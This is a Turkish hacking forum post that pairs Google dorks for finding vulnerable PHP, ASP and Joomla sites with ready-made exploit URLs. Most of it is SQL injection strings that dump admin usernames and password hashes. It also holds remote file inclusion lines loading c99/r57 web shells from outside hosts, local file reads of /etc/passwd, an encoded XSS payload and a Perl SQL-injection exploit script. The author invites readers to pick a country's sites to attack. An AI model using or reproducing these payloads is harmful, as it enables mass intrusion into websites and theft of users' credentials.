Evet Arkadaşlar Aşağıda Anlatıcağım Anlatım Bana Aitir
Dork : allinurl: "index2.php?id"
Exploide
1 http://www.target.dk/index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adg angskode),4,5,6+from+web1_brugere/*
2 http://www.target.dk/index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3+from+web2_brugere/*
3 http://www.target.dk/index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3,4,5,6+from+web3_brugere/*
4 http://www.target.dk/index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3,4,5,6+from+web4_brugere/*
Powered By: MFH v1 Açığı
Dork: "Powered by: MFH v1"
Exploitation options:
ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users
ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info
ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if its configured)
W.G.C.C Açığı
Google Dork : "Web Group Communication Center"
Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C
Powered By Zomplog Açığı
Dork: "powered by zomplog"
Exploit:
http://localhost/path/upload/force_download.php?file=force_download.php
Xcart Rfi Açığı
Google dork : "X-CART. Powerful PHP shopping cart software"
Exploit
site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt
Plugin-Class tabanlı Sistemlerde Açık
Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=
Exploide:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
Note: 2. dorkda .br/ yazan yerin yerine saldırmak istediğiniz ülkenin uzantısını yazabilirsiniz...
Powered By Linkspile Açığı
Dork : Powered By linkspile
Exploit :
http://www.example.com/link.php?cat...,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*
The Realestate ****** Açığı
Dork : inurl:dpage.php?docID
Exploit : http://www.example.com/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Passw ord)+from+admin
Calogic Calendars V1.2.2 Açığı
Dork : "CaLogic Calendars V1.2.2"
POC : http://localhost/[******_PATH]/userreg.php?langsel={SQL}
Example : http://localhost/[******_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
Powered By PHPizabi Açığı
Dork: "Powered by PHPizabi v0.848b C1 HFP1"
Exploit:
http://localhost/izabi/system/cache/pictures/id_shell.php
Example:
http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
AJ Auction 6.2.1 Açığı
DORK: inurl:"classifide_ad.php"
Exploide:
http://site.com/classifide_ad.php?i...3,4,CONCAT(user_name,char(58),password),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
Powered By Novus Açığı
Dork: "Powered by Novus"
İnformation server:
http://[novus]/notas.asp?nota_id=1+a...t(int,db_name())
http://[novus]/notas.asp?nota_id=1+a...nt,system_user)
http://[novus]/notas.asp?nota_id=1+a...@servername)--
http://[novus]/notas.asp?nota_id=1+a...t,@@version)--
Com-Mgm Açığı
Google Dork: inurl:"com_mgm"
Exploide:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Com-Loudmounth Açığı
Dork: inurl:com_loudmounth
Exploid:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Com-Thopper Açığı
Google Dork : inurl:com_thopper veya inurlhp?option=com_thopper
Exploid:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
Com-Bsq-Sitestats Açığı
Google Dork: inurl:com_bsq_sitestats
Exploid:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt
Com-PeopleBook Açığı
Google Dork: inurl:com_peoplebook
Exploid:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Joomla Component AstatsPRO Açığı
Dork: allinurl: "com_astatspro"
Exploide: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
WorkingOnWeb 2.0.1400 Açığı
Dork: Powered by WorkingOnWeb 2.0.1400
Exploide:
http://localhost/events.php?idevent...at(user,0x203a3a20,password),null,0,0,0,0,0,0, 0/**/from/**/mysql.user/*
Powered by cpDynaLinks Açığı
Dork: Powered by cpDynaLinks
connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
if(!$ARGV[0]) {
print "\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "
written by ka0x - ka0x01[at]gmail.com\n";
print "
usage: perl $0 [host]\n";
print "
example: http://host.com/cpDynaLinks\n";
exit(1);
}
print "\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
Gelen sayfada "kaynağı görüntüle"yiniz. İlk satırlarda admin nick vs md5 ler yer alır
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]
Admidio 1.4.8 RFI Açığı
Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program...e=../../adm_config/config.php&default_folder=
ezContents CMS Açığı
Dork: "ezContents CMS Version 2.0.0"
Exploits:
http://site.com/[patch]/showdetails.php?contentname="'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
Exploits 2:
http://site.com/[patch]/printer.php...,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
SoftbizScripts Açığı
Dork: "inurl
owered by SoftbizScripts" veya "Subscribe Newsletter"
Exploit: http://www.ssss.com/hostdirectory/search_result.php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--
****** Açığıdır...
ProfileCMS v1.0 Açığı
Dork: "Powered By ProfileCMS v1.0" veya "Total Generators & Widgets"
Exploit: http://target.com/index.php?app=pro...-1 union select 1,2,concat(id,0x3a,username,0 x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20u sers/*
http://target.org/index.php?app=vid...-1 union select 1,concat(id,0x3a,username,0x3 a,password,0x3a,email),3,4,5,6%20from%20users/*
http://target.net/index.php?app=arc...-1 union select 1,concat(id,0x3a,username,0x3 a,password,0x3a,email),3,4,5,6%20from%20users/*
http://target.net/index.php?app=arc...-1 union select 1,load_file(0x2f6574632f70617 3737764),3,4,5,6%20from%20users/*
Com-Rsgallery Açığı
Dork: : "option=com_rsgallery" veya inurl:index.php?option=com_rsgallery
Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--
Admin nick vs hashları verir. Joomlada bulunan bir açıktır
Admin girişi: /administrator/
Powered By Power Editor Açığı
Dork: Powered By Power Editor
Exploid : http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir] examp: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..
Kmitam Açığı
Dork: "inurl:/kmitam/"
Poc/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil
Yöntemi: Shell
BackLinkSpider Açığı
Dork: "Powered By BackLinkSpider" veya "inurl:backlinkspider.php"
Exploit: http://www.site.com/[backlinkspider_page_name].php?cat_id=[SQL]
http://www.site.com/[backlinkspider...-1 union select 1,2,3,4,5,6,7,8,9,0,1,version (),3,4,5,6,7,8,9,0/*
PHP-Nuke (Kose_Yazilari) Açığı
Google Arama : ''name Kose_Yazilari op viewarticle artid''
Google arama : ''name Kose_Yazilari op printpage artid''
Site sonuna : modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Açığı
Google Arama: "inurl:/plugins/wordtube"
Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt
Not: Html'den sonrasına kendi shell adresiniz gerekli.
Joomla" Component EventList Açığı
Google Arama : intext: Event List 0.8 Alpha by schlu.net
Site Sonuna : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Açığı
Google Arama : Powered by 6rbScript
Site Sonuna
PWD
http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--
USER
http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--
Com-Actualite Açığı
Google Arama : allinurl: "com_actualite"
Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Açığı
Google Arama : inurl:"/com_mtree/"
Site sonuna : http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
Webring Component (component_dir) Açığı
Google Arama: inurl:com_webring
Site Sonuna : http://www.site.com/[path]/administ...g.docs.php?component_dir=http://evil_scripts?
Com-Lmo Açığı
Google Arama : "com_lmo"
Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";
Com-PonyGallery Açığı
Google Arama : inurl:"index.php?option=com_ponygallery"
Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Açığı
Google Arama : inurl:index.php?option=com_NeoRecruit
Site Sonuna : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Açığı
Google Arama : inurl:"/index.php?option=com_rsfiles"
Site sonuna : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=
Com-Nicetalk Açığı
Google Arama : inurl:index.php?option=com_nicetalk
Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*
Com-Joomlaradiov5
Google Arama : inurl:"com_joomlaradiov5"
Site Sonuna : www.site.com/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://scriptkiddie.com/c99haxor.txt?
Com-JoomlaFlashFun Açığı
Google Arama : "com_joomlaflashfun"
Site Sonuna : http://xxx.net/2007/administrator/c...laflashfun.php?mosConfig_live_site=[attacker]
Carousel Flash Image Açığı
Google Arama : inurl:"com_jjgallery
Site Sonuna : http://[Taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?
Com-Mambads Açığı
Google Arama : inurl:com_mambads
Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
Kmita Tell Friend Açığı
Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/"
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil
Yöntemi: Shell
Panele yönlendirir.
View-FAQ Açığı
Dork: Google : "allinurl:viewfaqs.php?cat="
Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Days-Booking Açığı
Dork: "allinurl:index.php?user=daysbooking"
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
Gamma Scripts Açığı
Dork : "BlogMe PHP created by Gamma Scripts"
Exploit : http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)--
veya
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
ASPapp KnowledgeBase Açığı
Dork 1 - content_by_cat.asp?contentid ''catid''
Dork 2 - content_by_cat.asp? ''catid''
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--
vlBook 1.21 ****** Açığı
****** Download : http://home.vlab.info/vlbook_1.21.zip
DORK : "Powered by vlBook 1.21"
XSS Address : http://example/?l=" <******>alert('xss')</******>
LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00
PHP-Nuke Siir Açığı
DORK 1 : allinurl:"modules.php?name"print
DORK 2 : allinurl:"modules.php?name="Hikaye"
DORK 3: allinurl:"modules.php?name="Fikralar"
DORK 4: allinurl:"modules.php?name="bilgi"
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
Com_JoomlaFlashfun Açığı
Dork: "com_joomlaflashfun"
Example:
http://xxx.net/2007/administrator/c...joomlaflashfun.php?mosConfig_live_site=[xxxx]
Powered By The Black Lily 2007 Açığı
Dork : "Powered By The Black Lily 2007"
EXPLOIT:
http://victim.com/ar/products.php?class=-1 union select 1,2,password,4,username fro m%20admin/*
veya
http://victim.com/en/products.php?class=-1 union select 1,2,3,password,username fro m%20admin/*
JUser Joomla Component 1.0.14 Açığı
Dork: inurl:com_juser
Exploit
http://localhost/path/administrator...ctions.php?mosConfig_absolute_path=[evilcode]
Rmsoft GS 2.0 Açığı
Dork: intextowered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.php
Exploit:
modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
Com-Na-Xxx Açığı
DORK 1 : allinurl:"com_na_content"
DORK 2 : allinurl:"com_na_bible"
DORK 3 : allinurl:"com_na_events"
DORK 4 : allinurl:"com_na_content"
DORK 5 : allinurl:"com_na_feedback"
DORK 6 : allinurl:"com_na_mydocs"
DORK 7 : allinurl:"com_na_churchmap"
DORK 8 : allinurl:"com_na_bibleinfo"
DORK 9 : allinurl:"com_na_dbs"
DORK 10 : allinurl:"com_na_udm"
DORK 11 : allinurl:"com_na_qforms"
DORK 12 : allinurl:"com_na_gallery2"
DORK 13 : allinurl:"com_na_publicrss"
DORK 14 : allinurl:"index.php?kwd"
EXPLOİT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
Com-Comments Açığı
Dork: "Review ******", "Phil Taylor"
Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
Portfolio Manager 1.0 Açığı
Dork: inurl:"index.php?option=com_portfolio"
Exploit:
http://site.com/index.php?option=com_portfolio&memberId=9&category Id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
Com-Astatspro Açığı
Dork: allinurl: "com_astatspro"
PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
Gelen sayfada sağ tıkla kaynağı görüntüle.
<H1>302 Moved</H1>
The document has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.
Bu bölümde md5 saklıdır.
Modified By Fully Açığı
DORK : allinurl :kb.php?mode=article&k
DORK : "Powered by phpBB © 2001, 2006 phpBB Group" veya "Modified by Fully Modded phpBB © 2002, 2006"
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),usernam e,char(58),user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1
Easy-Clanpage v2.2 Açığı
Dork: "Easy-Clanpage v2.2"
Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
BM Classifieds Açığı
Dork 1 : ''showad.php?listingid=''
Dork 2 : ''pfriendly.php?ad=''
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Porar WebBoart Açığı
DorK : '' webboard question.asp QID''
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20';';
Com-Noticias Açığı
DorK : ''com_noticias''
EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(username,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*
ASPapp -links.asp Açığı
dork - ''links.asp?CatId''
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users
admin login-
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3 F
Modules-Viso Açığı
DORKS 1 : allinurl :"modules/viso"
EXPLOIT 1 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
EXPLOIT 2 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20exv2_admin%201
Bookmarkx ****** Açığı
DorK 1 : "2007 BookmarkX ******"
DORK 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :"index.php?menu=showtopic"
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
veya;
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
Com-Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Com-Jpad Açığı
DORK: allinurl:com_jpad
Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--
PostSchedule Açığı
Google Dork : "PostSchedule ver 1"
Exploid:
index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
joomla SQL Injection(Com-Jokes) Açığı
DorK : allinurl: "com_jokes"
EXPLOIT :
index.php?option=com_jokes&Itemid=bgh7&func=CatVie w&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
Com_Estateagent Açığı
Dork : allinurl: "com_estateagent"
EXPLOIT :
index.php?option=com_estateagent&Itemid=bgh7&func= showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=xxxx
Com-Fq Açığı
DorK: allinurl: "com_fq"
EXPLOIT :
index.php?option=com_fq&Itemid=S@BUN&listid=999999 9/**/union/**/select/**/name,password/**/from/**/mos_users/*
Com-Mamml Açığı
DorK : allinurl: "com_mamml"
EXPLOIT :
index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
joomla SQL Injection(com_gallery) Açığı
DORK : allinurl: com_gallery "func"
EXPLOIT 1 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*
EXPLOİT 2 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users
Joomla Component Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Joomla Component Filiale SQL Injection Açığı
DORK : inurl:com_filiale
Exploit : /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users
FlippingBook Açığı
DORK : inurl:com_flippingbook
Exploit :
/index.php?option=com_flippingbook&Itemid=28&book_i d=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
Pagenum Açığı
DORK : allinurl: " list.php?pagenum"
EXPLOIT
list.php?pagenum=0&categoryid=1+union+select+111,2 22,concat_ws(char(58),login,password),444+from+adm in_login/*
Modules-Tutorials Açığı
DORK 1 : allinurl :"/modules/tutorials/"
DORK 2 : allinurl :"/modules/tutorials/"tid
EXPLOIT 1 :
modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass), 3,4,5/**/from/**/xoops_users/*
EXPLOIT 2 :
modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*
Modules-Glossaires Açığı
DORK : allinurl: "modules/glossaires"
EXPLOIT :
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
OsCommerce SQL Injection Açığı
Google Dork: inurl:"customer_testimonials.php"
Exploit:
http://site.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
Not: Aynı zamanda yönetici değilde bütün üyelerin md5 lerini karşınıza dizer.
Tr ****** News v2.1 Açığı
Google Dork: inurl:news.php?mode=voir
Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
Admin girişi = /admin
Com-Alberghi Açığı
DORK 1 : allinurl: "" detail
DORK 2 : allinurl: "com_alberghi"
EXPLOIT 1 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,con cat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOIT 2 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3 ,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*
Powered By Joovideo V1.0 Açığı
DORK 1 : allinurl: "com_joovideo" detail
DORK 2 : allinurl: "com_joovideo"
DORK 3 : Powered by joovideo V1.0
EXPLOIT :
index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2 ,2,concat(username,0x3a,password)/**/from/**/jos_users/*
AllMy-Guests ****** Açığı
Açığı bulunan ******: AllMyGuests
Google Dork: "powered by AllMyGuests" (Tırnaklar yok)
